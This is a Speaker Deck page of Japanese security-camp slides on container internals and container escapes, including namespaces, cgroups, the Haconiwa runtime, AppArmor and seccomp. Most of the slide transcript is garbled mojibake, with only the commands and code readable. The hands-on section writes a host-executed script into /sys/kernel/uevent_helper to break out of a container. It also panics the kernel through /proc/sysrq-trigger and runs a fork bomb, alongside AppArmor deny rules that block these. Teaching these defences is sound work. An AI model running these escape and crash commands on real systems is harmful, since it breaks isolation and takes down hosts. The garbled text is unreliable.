Upgrade to Pro — share decks privately, control downloads, hide ads and more …

コンテナの作り方、壊し方 / Container Structure and Exploita...

Avatar for mrtc0 mrtc0
November 10, 2018
Programming
21
23k

コンテナの作り方、壊し方 / Container Structure and Exploitation Method

セキュリティ・ミニキャンプ2018 in 愛媛での資料です。 #seccamp
Avatar for mrtc0

mrtc0

November 10, 2018
Tweet

More Decks by mrtc0

See All by mrtc0
Datadog を使ったプロダクトとクラウドの セキュリティモニタリング
Avatar for mrtc0 mrtc0
0
2.4k
コードで理解する eBPF セキュリティモニタリング
Avatar for mrtc0 mrtc0
2
200
Product Security Casual Talk #1 - Datadog を使ったセキュリティモニタリングと 自動化の取り組み
Avatar for mrtc0 mrtc0
2
560
GMO ペパボ株式会社 23卒・24卒向け セキュリティ勉強会 実践 DevSecOps パイプライン
Avatar for mrtc0 mrtc0
1
610
実践 DevSecOps パイプライン ~システム開発へのセキュリティの取り入れ方~
Avatar for mrtc0 mrtc0
2
480
脅威モデリングで考える Kubernetes セキュリティ / CloudNative Days Tokyo 2021 #CNDT2021 #CNDT2021_B
Avatar for mrtc0 mrtc0
8
3.1k
ProSec-IT 2021 Container Security
Avatar for mrtc0 mrtc0
2
720
GMO Developer Day 2021 - DevSecOps 推進の取り組みの紹介.pdf
Avatar for mrtc0 mrtc0
4
1.7k
Web セキュリティ研修 / GMO ペパボ 新卒研修 2021
Avatar for mrtc0 mrtc0
7
45k

Other Decks in Programming

See All in Programming
個人開発の学生アプリが企業譲渡されるまで
Avatar for akidon0000 akidon0000
2
1.2k
M5UnitUnified 最新動向 2025/05
Avatar for GOB gob
0
150
AI Coding Agents Enablement in TypeScript
Avatar for Yuku Kotani yukukotani
9
1.7k
インプロセスQAにおいて大事にしていること / In-process QA Meetup
Avatar for MEDLEY, INC. medley
0
190
Flutterでllama.cppをつかってローカルLLMを試してみた
Avatar for sakuraidayo sakuraidayo
0
160
マイコンでもRustのtestがしたい/KernelVM Kansai 11
Avatar for Toshifumi NISHINAGA tnishinaga
1
960
ドメイン駆動設計とXPで支える子どもの未来 / Domain-Driven Design and XP Supporting Children's Future
Avatar for nrs nrslib
0
330
Instrumentsを使用した アプリのパフォーマンス向上方法
Avatar for hinakko hinakko
0
260
クラシルリワードにおける
iOSアプリ開発の取り組み
Avatar for fumito nakazawa funzin
1
230
“技術カンファレンスで何か変わる?” ──RubyKaigi後の自分とチームを振り返る
Avatar for shun ssagara00
0
170
AI時代のリアーキテクチャ戦略 / Re-architecture Strategy in the AI Era
Avatar for dachi023 dachi023
0
160
Носок на сок
Avatar for Bo0oM bo0om
0
1.5k

Featured

See All Featured
The Cost Of JavaScript in 2023
Avatar for Addy Osmani addyosmani
49
7.9k
GitHub's CSS Performance
Avatar for Jon Rohan jonrohan
1031
460k
Why Our Code Smells
Avatar for Brandon Keepers bkeepers
PRO
336
57k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
Avatar for soudai sone soudai
180
53k
RailsConf 2023
Avatar for Aaron Patterson tenderlove
30
1.1k
Practical Orchestrator
Avatar for Shlomi Noach shlominoach
187
11k
For a Future-Friendly Web
Avatar for Brad Frost brad_frost
177
9.7k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
Avatar for Dan Newman danielanewman
227
22k
What's in a price? How to price your products and services
Avatar for Michael Herold michaelherold
245
12k
Rebuilding a faster, lazier Slack
Avatar for samanthasiow samanthasiow
81
9k
Bash Introduction
Avatar for André Augusto Costa Santos 62gerente
613
210k
Optimizing for Happiness
Avatar for Tom Preston-Werner mojombo
378
70k

Transcript

  1. ίϯςφͷ࡞Γํɺյ͠ํ ίϯςφͷηΩϡϦςΟΛ஌Ζ͏ ৿ాߒฏ !NSUD (.01FQBCP *OD ηΩϡϦςΟɾϛχΩϟϯϓJOѪඤ

  2. (.0ϖύϘηΩϡϦςΟରࡦࣨ ৿ాߒฏ!NSUD ,PIFJ.PSJUB IUUQTCMPHTTSGJO

  3. ೥ʹηΩϡϦςΟΩϟϯϓશࠃେձʹࢀՃ ೥ΑΓ4&$$0/#FHJOOFSTߨࢣ େֶࡏֶத͸ΠΤϥΤηΩϡϦςΟʹͯ8FC੬ऑੑ਍அʢΞϧόΠτʣ ೥౓*1"ະ౿ΫϦΤΠλʔ ೥ʹ(.0ϖύϘגࣜձࣾʹೖࣾ

  4. TFDDBNQ

  5. ͸͡Ίʹ wຊεϥΠυ͸ʮ۝भηΩϡϦςΟΧϯϑΝϨϯεʯͰಉ྅ͷۙ౻Ӊஐ࿕͞Μ @udzura ͱൃදͨ͠಺༰ΛҰ෦վมͨ͠΋ͷͰ͋Δ wʮίϯςφͷηΩϡϦςΟΛத਎͔Βཧղ͠Α͏ʯ wIUUQTTQFBLFSEFDLDPNVE[VSBJOTJEFPVUDPOUBJOFSBOEJUTTFDVSJUZ wεϥΠυͷར༻ͷڐՄΛ௖͖ɺҰ෦վม͍ͯ͠·͢ wշ୚௖͍ͨ!VE[VSB͞Μʹײँ͍ͨ͠·͢

  6. ͸͡Ίʹ wԋशϝΠϯͳͷͰɺࠔͬͨΒۙ͘ͷਓɺνϡʔλʔ͞ΜΛཔΓ·͠ΐ͏ wίϚϯυ͕ࣦഊ͢Δɺૢ࡞͕Θ͔Βͳ͍ͳͲ͸ɺͲΜͲΜฉ͍͍ͯͩ͘͞ wνʔτγʔτΛ༻ҙ͍ͯ͠ΔͷͰ͝׆༻͍ͩ͘͞ wάϧʔϓͷਓͱ࿩͠ͳ͕ΒਐΊͯ0,Ͱ͢ wੵۃతʹձ࿩͍ͯͩ͘͠͞ʂ

  7. "HFOEB ίϯςφԾ૝Խͱ͸ʁ ίϯςφͷ࢓૊ΈΛͷ͍ͧͯΈΑ͏ ίϯςφΛ࡞ͬͯΈΑ͏ ίϯςφͷηΩϡϦςΟϞσϧͱ"UUBDL4VSGBDFT ίϯςφΛյͦ͏

  8. ࠓ೔ͷΰʔϧ ίϯςφͷ࢓૊ΈΛͬ͘͟Γཧղ͠Α͏ ίϯςφͷηΩϡϦςΟػߏΛ஌Ζ͏ εΠʔενʔζϞσϧΛମݧ͠Α͏

  9. ίϯςφԾ૝Խͱ͸ʁ

  10. ࣍ͷιϑτ΢ΣΞΛ ࢖ͬͨ͜ͱ͕͋Δํʁ

  11. None
  12. None
  13. None

  14. Ծ૝Խ 7JSUVBMJ[BUJPO

  15. ͍ΘΏΔԾ૝Խ ϋʔυ΢ΣΞ ϗετ04ϋΠύʔόΠβ )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO ήετ04

    ήετ04 ήετ04 ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ

  16. ͍ΘΏΔԾ૝Խ ϋʔυ΢ΣΞ ϗετ04ϋΠύʔόΠβ )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO ήετ04

    ήετ04 ήετ04 ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ

  17. ίϯςφԾ૝Խ ϋʔυ΢ΣΞ ϗετ04 -JOVY ίϯςφΤϯδϯ ίϯςφΤϯδϯ ίϯςφΤϯδϯ ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ

    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ 04ͷػೳ͸ڞ௨Ͱ࢖༻ ϗετͱಉ͡,FSOFMΛ࢖͏

  18. ίϯςφ͸Ͳ͜Ͱ࢖ΘΕ͍ͯΔ͔

  19. ίϯςφ͕ͲͷΑ͏ʹ࢖ΘΕ͍ͯΔ͔ IUUQTFOXJLJQFEJBPSHXJLJ,VCFSOFUFT

  20. ίϯςφͷηΩϡϦςΟ  ίϯςφϥϯλΠϜࣗମͷ࣮૷  ίϯςφͷηΩϡϦςΟϙϦγʔ  ίϯςφͷωοτϫʔΫ  ΦʔέετϨʔγϣϯϚωʔδυαʔϏε

  21. ίϯςφͷ࣮૷

  22. -9$ )"$0/*8" SLU

  23. ίϯςφͷϝϦοτ QSPT

  24. ίϯςφͷϝϦοτ  ىಈ͕ߴ଎ɺܰྔ  ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ

  25. ίϯςφͷϝϦοτ  ىಈ͕ߴ଎ɺܰྔ  ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ Ϋϥ΢υʹ޲͍͍ͯΔ ΞϓϦέʔγϣϯΛؙ͝ͱίϯςφԽɺߴ଎ͳσϓϩΠɺ։ൃ

  26. ίϯςφͷσϝϦοτ DPOT

  27. ݖݶ෼཭ Ϧιʔεޮ཰ ϋΠύʔόΠβܕ ιϑτ΢ΣΞܕ ίϯςφܕ ݖݶ෼཭͕ऑ͍

  28. ίϯςφͷத਎Λͷ͍ͧͯΈΑ͏ IUUQTqJDLSQBB,5I

  29. ίϯςφ͸Ͳ͏΍ͬͯ ίϯςφʹͳ͍ͬͯΔͷ͔ʁ

  30. ࣍ͷը໘Λݟͨ͜ͱ͕͋Δํʁ

  31. None
  32. None

  33. ϓϩηε 1SPDFTT

  34. ίϯςφ͸ϓϩηε

  35. $ ./a.out BPVU -JOVYΧʔωϧ ϥΠϒϥϦ γεςϜίʔϧ

  36. BPVU $ ps xf -C a.out 3262 ? S 0:00

    sshd: vagrant@pts/2 3263 pts/2 Ss 0:00 \_ -bash 3372 pts/2 S+ 0:00 \_ ./a.out

  37. BPVU $ ps xf -C a.out 3262 ? S 0:00

    sshd: vagrant@pts/2 3263 pts/2 Ss 0:00 \_ -bash 3372 pts/2 S+ 0:00 \_ ./a.out

  38. $ ./a.out ࢠϓϩηε ਌ϓϩηε CBTIͳͲ ৽͍͠ϓϩάϥϜ fork(2) wait(2) execve(2) execve(“/bin/cat”,

    …)

  39. $ ./a.out ࢠϓϩηε ਌ϓϩηε CBTIͳͲ ৽͍͠ϓϩάϥϜ fork(2) wait(2) execve(2) ಛघͳॲཧ

  40. ίϯςφ͸ ಛघͳ ϓϩηε

  41. ී௨ͷϓϩηεͱίϯςφͷҧ͍ w ίϯςφ͸ಛघͳϓϩηε w ۩ମతʹ͸ ɹ ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠ ɹ ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ ɹ͜ͱͰݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ

  42. ී௨ͷϓϩηεͱίϯςφͷҧ͍ w ίϯςφ͸ಛघͳϓϩηε w ۩ମతʹ͸ ɹ ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠ ɹ ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ ɹ͜ͱͰݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ

    -JOVY /BNFTQBDF DHSPVQT

  43. ʮίϯςφ͸ϓϩηεͰ͋Δʯ ͜ͱΛ֬ೝ

  44. %PDLFSίϯςφͷىಈ $ docker ps -a CONTAINER ID IMAGE COMMAND 4521880cffa8

    minicamp-1 "/usr/sbin/apache2ct…" $ docker start 4521 $ curl localhost:8080 -s | grep '<title>' <title>Apache2 Ubuntu Default Page: It works</title>

  45. ϓϩηεπϦʔΛ֬ೝ $ ps auxf $ sudo apt-get install apache2 &&

    sudo systemctl start apache2  %PDLFS͕࡞ΔϓϩηεπϦʔΛݟΑ͏  ϗετͰ௚઀BQBDIFΛ্ཱͪ͛ͯΈͯϓϩηεπϦʔΛݟΑ͏

  46. -JOVY/BNFTQBDF

  47. -JOVY/BNFTQBDFΛ֬ೝ͢Δ $ docker ps CONTAINER ID IMAGE COMMAND 4521880cffa8 minicamp-1

    “/usr/sbin/apache2ct…" $ docker exec -ti 45 bash # ίϯςφʹʮΞλονʯ͢Δ # ip a # ίϯςφ಺෦ͷωοτϫʔΫΛ֬ೝ͢Δ # exit # ίϯςφ͔Βൈ͚ͯ $ ip a # ϗετͷωοτϫʔΫͱൺֱ͢Δ

  48. $ ip a # ϗετଆ 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500

    qdisc pfifo_fast state UP group default qlen 1000 link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3 valid_lft forever preferred_lft forever inet6 fe80::40:c1ff:fefa:9bf5/64 scope link valid_lft forever preferred_lft forever # ip a # Dockerίϯςφଆ 10: eth0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever

  49. $ ip a # ϗετଆ 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500

    qdisc pfifo_fast state UP group default qlen 1000 link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3 valid_lft forever preferred_lft forever inet6 fe80::40:c1ff:fefa:9bf5/64 scope link valid_lft forever preferred_lft forever # ip a # Dockerίϯςφଆ 10: eth0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever ίϯςφ͸ಉ͡Ϛγϯʹ͋Δϓϩηε ʹ΋͔͔ΘΒͣɺಠཱͨ͠ωοτϫʔΫ͕౰͍ͨͬͯΔ

  50. ଞͷ-JOVY/BNFTQBDF΋֬ೝ͢Δ $ docker exec -ti 45 hostname 4521880cffa8 $ hostname

    ubuntu-xenial w ϗετ໊΋ҟͳ͍ͬͯΔ͜ͱΛ֬ೝͯ͠ΈΑ͏

  51. ଞͷ-JOVY/BNFTQBDF΋֬ೝ͢Δ w ϓϩηεʹ͸ϓϩηε*% 1*% ͕͋Δ͕ɺͦͷ࠾൪͕ʮಠཱʯ͍ͯ͠Δ w ಉ͡1*%ʹҧ͏ϓϩηεׂ͕Γ౰ͯΒΕ͍ͯΔ͜ͱΛ֬ೝ͠Α͏ $ docker exec

    -ti 45 ps auxf $ ps auxf

  52. Πϝʔδ host-1 192.168.1.1/24 container-1 172.16.1.1/24 container-2 10.1.1.1/24 ϗετ04 -JOVY ίϯςφ

    ίϯςφ w ʮϓϩηεΛ෼཭ʯ͍ͯ͠Δɻ04ͷػೳ͸ϗετͱڞ༗ɻ

  53. /BNFTQBDF͸ Ͳ͜Ͱ֬ೝ͢Δʁ

  54. /BNFTQBDFΛݟΔ $ ps auxf | grep -A 10 docker[d] ϗετ͔Βݟͨίϯςφͷ"QBDIFͷ1*%Λ֬ೝ͠Α͏

    $ sudo ls -l /proc/$PID/ns ҎԼͷσΟϨΫτϦΛௐ΂Δ $ sudo ls -l /proc/self/ns ϗετͷํ͸Ͳ͏ͳͷ͔ௐ΂ͯ໨EJ⒎͠Α͏

  55. $ sudo ls -l /proc/3625/ns total 0 lrwxrwxrwx 1 root

    root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835] lrwxrwxrwx 1 root root 0 Nov 3 03:08 ipc -> ipc:[4026532276] lrwxrwxrwx 1 root root 0 Nov 3 03:08 mnt -> mnt:[4026532274] lrwxrwxrwx 1 root root 0 Nov 3 02:55 net -> net:[4026532279] lrwxrwxrwx 1 root root 0 Nov 3 03:08 pid -> pid:[4026532277] lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837] lrwxrwxrwx 1 root root 0 Nov 3 03:08 uts -> uts:[4026532275] $ sudo ls -l /proc/self/ns total 0 lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835] lrwxrwxrwx 1 root root 0 Nov 3 03:45 ipc -> ipc:[4026531839] lrwxrwxrwx 1 root root 0 Nov 3 03:45 mnt -> mnt:[4026531840] lrwxrwxrwx 1 root root 0 Nov 3 03:45 net -> net:[4026531957] lrwxrwxrwx 1 root root 0 Nov 3 03:45 pid -> pid:[4026531836] lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837] lrwxrwxrwx 1 root root 0 Nov 3 03:45 uts -> uts:[4026531838] ໨EJ⒎͠Α͏

  56. &OUFSUIF/BNFTQBDF w ωοτϫʔΫۭؒͷΈʹΞλονͯ͠ΈΑ͏ JQBͷ݁Ռ͸%PDLFSϗετͱൺ΂ͯͲ͏ʁ IPTUOBNFͷ࣮ߦ݁Ռ͸ʁ $ sudo nsenter --net -t

    $PID $ sudo nsenter --uts -t $PID

  57. -JOVY/BNFTQBDF ໊લۭؒ ֓ཁ 1*%໊લۭؒ 1*%ͷ෼཭ Ϛ΢ϯτ໊લۭؒ ϑΝΠϧγεςϜπϦʔͷ෼཭ *1$໊લۭؒ *1$ͷ෼཭ ωοτϫʔΫ໊લۭؒ

    ωοτϫʔΫΠϯλʔϑΣΠεͷ෼཭ 654໊લۭؒ ϗετ໊ͷ෼཭ Ϣʔβʔ໊લۭؒ 6*%(*%ͷ෼཭

  58. DHSPVQ

  59. ίϯςφͷϝϦοτ  ىಈ͕ߴ଎ɺܰྔ  ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ

  60. ίϯςφͷϝϞϦׂΓ౰ͯΛ֬ೝ ϝϞϦͷׂ౰Λ֬ೝ͠Α͏ $ CID=$(docker inspect -f '{{.ID}}' 45) $ sudo

    cat /sys/fs/cgroup/memory/docker/$CID/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.limit_in_bytes ׂ౰ͷগͳ͍ίϯςφΛ࡞Γɺൺֱ͠Α͏ $ CID2=$(docker run --memory=8m -d minicamp-1); $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes

  61. ൺֱ͠Α͏ ੍ݶͷ༗ແͰίϯςφͷॲཧ଎౓͕ҟͳΔ͜ͱΛ֬ೝ͠Α͏ $ docker exec -ti $CID bash $ docker

    exec -ti $CID2 bash wBQUHFUVQEBUFΛ࣮ߦͯ͠ΈΑ͏ ௚઀ϝϞϦ࢖༻ྔΛมߋͯ͠ڍಈ͕վળ͢Δ͜ͱΛ֬ೝ͠Α͏ $ echo '128m' | sudo tee /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes $ docker exec -ti $CID2 bash root@d6a2825b878a:/# apt-get update

  62. DHSPVQTͰ੍ޚͰ͖Δ΋ͷ w $16 w ϝϞϦ w σΟεΫ*0ͷଳҬ w ϓϩηε਺ w

    FUDʜ

  63. ίϯςφΛ࡞ͬͯΈΑ͏ IUUQTqJDLSQBQH/#

  64. )BDPOJXB w @udzura (.0ϖύϘ ΒʹΑͬͯ։ൃ͞Εͨ-JOVYίϯςφϥϯλΠϜ w NSVCZͰઃఆ΍ϑοΫΛهड़Ͱ͖Δͷ͕ಛ௃ w IUUQTHJUIVCDPNIBDPOJXBIBDPOJXB $

    haconiwa version haconiwa: v0.9.5

  65. Πϝʔδ SPPUGT Λ࡞Δ $ mkdir /tmp/minicamp $ docker export 45

    | sudo tar -xv -f - -C /tmp/minicamp/ $ ls /tmp/minicamp/ bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

  66. ઃఆϑΝΠϧΛੜ੒ $ haconiwa init first-container.haco assign new haconiwa name =

    haconiwa-4ad5ea68 assign rootfs location = /var/lib/haconiwa/4ad5ea68 create first-container.haco

  67. ઃఆΛมߋ # -*- mode: ruby -*- Haconiwa.define do |config| #

    The container name and container's hostname: config.name = "haconiwa-4ad5ea68" # The first process when invoking haconiwa run: config.init_command = "/bin/bash" # If your first process is a daemon, please explicitly daemonize by: # config.daemonize! . . . # The rootfs location on your host OS # Pathname class is useful: root = Pathname.new(“/tmp/minicamp”) config.chroot_to root

  68. ίϯςφΛىಈ $ haconiwa run first-container.haco Create lock: #<Lockfile path=/var/lock/.haconiwa-4ad5ea68.hacolock> Container

    fork success and going to wait: pid=6855 groups: cannot find name for group ID 1000 root@haconiwa-4ad5ea68:/# ps ax PID TTY STAT TIME COMMAND 1 pts/3 S 0:00 /bin/bash 8 pts/3 R+ 0:00 ps ax

  69. εΫϥονͰ࡞Ζ͏

  70. ·ͣ͸GPSLFYFDWFDISPPU͚ͩͰ pid = Process.fork do Dir.chroot "/tmp/minicamp/" Dir.chdir "/" Exec.execve

    ENV, "/bin/bash" end p(Process.waitpid2 pid) $ hacorb test.rb bash-4.3$ pwd / bash-4.3$ ls bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

  71. 1*%໊લۭؒΛ෼཭ Namespace.unshare(Namespace::CLONE_NEWPID) pid = Process.fork do Dir.chroot "/tmp/minicamp/" Dir.chdir "/"

    Exec.execve ENV, "/bin/bash" end $ sudo hacorb test.rb bash-4.3$ mount -t proc proc /proc bash-4.3$ ps aux

  72. DHSPVQΛઃఆ limit = “3" Namespace.unshare(Namespace::CLONE_NEWPID) pid = Process.fork do Dir.mkdir

    "/sys/fs/cgroup/pids/minicamp" rescue nil system "echo #{limit} > /sys/fs/cgroup/pids/minicamp/pids.max" system "echo #{Process.pid} > /sys/fs/cgroup/pids/minicamp/tasks" Dir.chroot "/tmp/minicamp/" Dir.chdir "/" Exec.execve ENV, "/bin/bash" end $ sudo hacorb test.rb # ( echo 'test' | cat ) # bomb () { bomb | bomb & }; bomb

  73. ͜͜·Ͱͷ·ͱΊ w ίϯςφ͸ϗετ͔ΒݟΔͱ୯ͳΔϓϩηεͰ͋Δ w -JOVY͕࣋ͭίϯςφԽͷػೳΛ૊Έ߹Θ͍ͤͯΔ w ϓϩηεͷಠཱੑΛߴΊΔ /BNFTQBDF  w

    ϦιʔεΛׂΓ͋ͯΔʢDHSPVQ  w ͦΕҎ֎΋͋ΔΑ

  74. ෼΄Ͳٳܜ IUUQTqJDLSQQU,O/

  75. ίϯςφͷηΩϡϦςΟϞσϧͱ "UUBDL4VSGBDFT IUUQTqJDLSQB)9

  76. ίϯςφͷηΩϡϦςΟػߏ w -JOVY/BNFTQBDFʹΑΔ෼཭ w DHSPVQʹΑΔϦιʔε੍ޚ

  77. ίϯςφͷηΩϡϦςΟػߏ w -JOVY/BNFTQBDFʹΑΔ෼཭ w DHSPVQʹΑΔϦιʔε੍ޚ w "QQ"SNPS w TFDDPNQ w

    ಛఆͷϑΝΠϧͷύʔϛογϣϯΛམͱ͢

  78. ίϯςφԾ૝Խ ϋʔυ΢ΣΞ ϗετ04 -JOVY ίϯςφΤϯδϯ ίϯςφΤϯδϯ ίϯςφΤϯδϯ ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ

    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ 04ͷػೳ͸ڞ௨Ͱ࢖༻ ϗετͱಉ͡,FSOFMΛ࢖͏

  79. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ

  80. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ Χʔωϧͷ੬ऑੑΛಥ͘

  81. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ ☠ ίϯςφͷઃఆෆඋΛಥ͘ FHEPDLFSŠQSJWJMFHFE

  82. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ ωοτϫʔΫͷઃఆෆඋΛಥ͘

  83. "UUBDL4VSGBDFT ,FSOFM 6TFS 4FDVSJUZ1PMJDZ ωοτϫʔΫͷઃఆෆඋΛಥ͘ $POUBJOFS $POUBJOFS $POUBJOFS

  84. εΠενʔζϞσϧ w ίϯςφͰར༻͞ΕΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳ͕ॏෳ͍ͯ͠Δ΋ͷ΋͋Δ w $BQBCJMJUZͱTFDDPNQͷ྆ํͰಛఆͷγεςϜίʔϧΛېࢭ͍ͯͨ͠Γ w ͋Δػߏ͕#ZQBTT͞Εͯ͠·ͬͯ΋ɺผͷػߏͰ๷͙؇࿨͢Δ

  85. ίϯςφΛյͦ͏

  86. $POUBJOFS4FDVSJUZ 04Ϧιʔεͷ෼཭ 1SPDFTT pMFTZTUFN FUDʜ wDISPPUQJWPU@SPPU w-JOVY/BNFTQBDF wTFDDPNQ w-JOVY$BQBCJMJUZ wDHSPVQT

    w4&-JOVY"QQ"SNPS ݖݶػೳͷ੍ݶ QFSNJTTJPO TZTDBMM 04Ϧιʔεͷ੍ݶ $16 .FNPSZ ΞΫηείϯτϩʔϧ ಛఆͷϑΝΠϧ΁ͷΞΫηεېࢭʣ

  87. "QQ"SNPS

  88. "QQ"SNPS wίϯςφ͸ϗετͱҰ෦ͷϑΝΠϧΛڞ༗͍ͯ͠Δ wಡΈॻ͖͕Ͱ͖ΔͱϗετʹӨڹΛٴ΅͢ϑΝΠϧ΋͋Δ wFY /proc/kcore /proc/sysrq-trigger w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSͰ੍ޚ͍ͯ͠Δ w΋͠ॻ͖ࠐΊͨ৔߹ʹͲͷΑ͏ͳ͜ͱ͕ى͜Δͷ͔͔֬ΊͯΈΑ͏ʂ

  89. /sys/kernel/uevent_helper wuevent͸σόΠε͕௥Ճ࡟আ͞Εͨͱ͖ʹΧʔωϧ͕ૹ৴͢ΔΠϕϯτ wuevent͕ૹ৴͞Εͨͱ͖ʹɺuevent_helperʹॻ͖ࠐ·Ε͍ͯΔύεͷϓ ϩάϥϜΛ࣮ߦ͢Δ wuevent͸Ϣʔβʔϥϯυ͔Βૹ৴Մೳ •/sys/devices/virtual/mem/null/uevent •/sys/class/mem/null/uevent

  90. ίϯςφΛىಈͯ͠ઃఆ $ haconiwa start sample1.haco root@sample:/# echo “export PATH=$PATH” >>

    /root/.bashrc root@sample:/# bash root@sample:/# apt-get install gcc

  91. ίϯςφ͔Βൈ͚ग़ͯ͠ΈΑ͏ $ haconiwa start sample1.haco root@sample:/# cat /root/hello.sh # ޷͖ͳΤσΟλͰॻ͖ࠐΉ

    #!/bin/sh echo “Hello, Host! ;)” > /tmp/hello.txt root@sample:/# chmod +x /root/hello.sh root@sample:/# echo “/var/lib/haconiwa/sample/root/hello.sh” > /sys/kernel/uevent_helper

  92. ίϯςφ͔Βൈ͚ग़ͯ͠ΈΑ͏ $ ls /tmp/ root@sample:/# echo change > /sys/class/mem/null/uevent $

    ls /tmp hello.txt $ cat /tmp/hello.txt hello host! ;)

  93. QSPDTZTSRUSJHHFS root@sample1:/# echo c > /proc/sysrq-trigger w/proc/sysrq-triggerʹಛఆͷจࣈྻΛૹ৴͢Δ͜ͱͰϗετΛ࠶ىಈ͞ ͤͨΓΧʔωϧύχοΫΛىͨ͜͠ΓͰ͖Δ

  94. "QQ"SNPS deny /usr/bin/top mrwklx, # top ίϚϯυͷಡΈॻ͖࣮ߦΛېࢭ wϓϩάϥϜ୯ҐͰϑΝΠϧ΍ιέοτ΁ͷڧ੍ΞΫηε੍ޚ ."$ Λߦ͏

    wNSLXLMY͸ΞΫηεϞʔυΛද͠ɺS͸3FBE X͸XSJUF Y͸࣮ߦΛද͢ wIUUQNBOQBHFTVCVOUVDPNNBOQBHFTCJPOJDNBOBQQBSNPSE IUNM

  95. ๷͍ͰΈΑ͏ $ cat apparmor/haconiwa-test … deny /usr/bin/top mrwklx, deny @{PROC}/sysrq-trigger

    rwklx, … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏

  96. ๷͍ͰΈΑ͏ $ sudo cp apparmor/haconiwa-test /etc/apparmor.d/haconiwa/ $ sudo apparmor_parser -Kr

    \ /etc/apparmor.d/haconiwa/haconiwa-test $ cat sample1.haco … config.apparmor = "haconiwa-test" … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏

  97. ๷͍ͰΈΑ͏ $ haconiwa start sample1.haco root@sample1:/# top bash: /usr/bin/top: Permission

    denied root@sample1:/# echo c > /proc/sysrq-trigger bash: /proc/sysrq-trigger: Permission denied

  98. "QQ"SNPSʹΑΔอޢ w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSʹΑͬͯίϯςφͰར༻Ͱ͖Δί Ϛϯυͷ࣮ߦ΍ϑΝΠϧ΁ͷಡΈॻ͖Λ੍ݶͰ͖Δ •/proc/sysrq-trigger •/proc/sys/kernel/core_pattern •/proc/sys/kernel/modprobe •/sys/kernel/uevent_helper

  99. TFDDPNQ

  100. TFDDPNQ wγεςϜίʔϧͷϑΟϧλϦϯάΛߦ͏࢓૊Έ wϗετଆʹΤεέʔϓΛڐͯ͠͠·͏Α͏ͳةݥͳγεςϜίʔϧΛ๷͙ root@sample1:/# mkdir /tmp/hoge Bad system call

  101. TFDDPNQΛମݧ͠Α͏ $ cat sample2.haco config.seccomp.filter(default: :allow) do |rule| rule.kill :mkdir

    # mkdir(2) Λېࢭ end $ sudo haconiwa start sample2.haco root@sample1:/# mkdir /tmp/hoge Bad system call

